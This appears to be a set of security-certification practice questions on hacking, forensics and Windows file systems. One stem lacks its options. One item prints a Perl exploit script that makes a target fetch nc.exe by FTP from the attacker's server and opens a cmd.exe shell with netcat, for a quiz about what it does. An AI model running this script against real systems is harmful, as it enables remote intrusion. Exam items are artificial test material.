Maria works as a professional Ethical Hacker. She recently got a project to test the security of www.we-are-secure.com. Arrange the three pre-test phases of the attack to test the security of weare-secure.

Which of the following directories cannot be placed out of the root filesystem?

Each correct answer represents a complete solution. Choose all that apply.

A. /sbin

B. /etc

C. /var

D. /lib

Which of the following is a type of intruder detection that involves logging network events to a file for an administrator to review later?

A. Packet detection

B. Passive detection

C. Active detection

D. Event detection

Adam works as a professional Computer Hacking Forensic Investigator. He works with the local police. A project has been assigned to him to investigate an iPod, which was seized from a student of the high school. It is suspected that the explicit child pornography contents are stored in the iPod. Adam wants to investigate the iPod extensively. Which of the following operating systems will Adam use to carry out his investigations in more extensive and elaborate manner?

A. Linux

B. MINIX 3

C. Windows XP

D. Mac OS

You are responsible for maintaining and troubleshooting PC's at your company. The receptionist reports her screen has gone blue. When you get there you notice the 'blue screen of death' with an error message NTFS_FILE_SYSTEM. What is the most likely cause of this error?

A. The hard disk is corrupt

B. A virus

C. Windows was installed improperly.

D. Get the latest patch for Windows.

Which utility enables you to access files from a Windows .CAB file?

A. ACCESS.EXE

B. WINZIP.EXE

C. XCOPY.EXE

D. EXTRACT.EXE

Which of the following statements about the compression feature of the NTFS file system are true?

Each correct answer represents a complete solution. Choose two.

A. Users can work with NTFS-compressed files without decompressing them.

B. It supports compression only on volumes.

C. Compressed files on an NTFS volume can be read and written by any Windows-based application after they are decompressed.

D. It supports compression on volumes, folders, and files.

Adam, a malicious hacker performs an exploit, which is given below:

###########################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

###########################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl

msadc.pl -h $host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");

system("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo

bin>>sasfile\""); system("perl

msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C

\"echo get hacked.

html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print

"Server is downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when

download is finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";

#system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

A. Creates an FTP server with write permissions enabled

B. Opens up a telnet listener that requires no username or password

C. Opens up a SMTP server that requires no username or password

D. Creates a share called "sasfile" on the target system

You are the Security Consultant working with a client who uses a lot of outdated systems. Many of their clients PC's still have Windows 98. You are concerned about the security of passwords on a Windows 98 machine. What algorithm is used in Windows 98 to hash passwords?

A. DES

B. SHA

C. LANMAN

D. MD5

Which of the following file systems are supported by Windows 2000 operating systems? Each correct answer represents a complete solution. Choose all that apply.

A. NTFS4

B. CDFS

C. FAT32

D. HPFS

E. NTFS5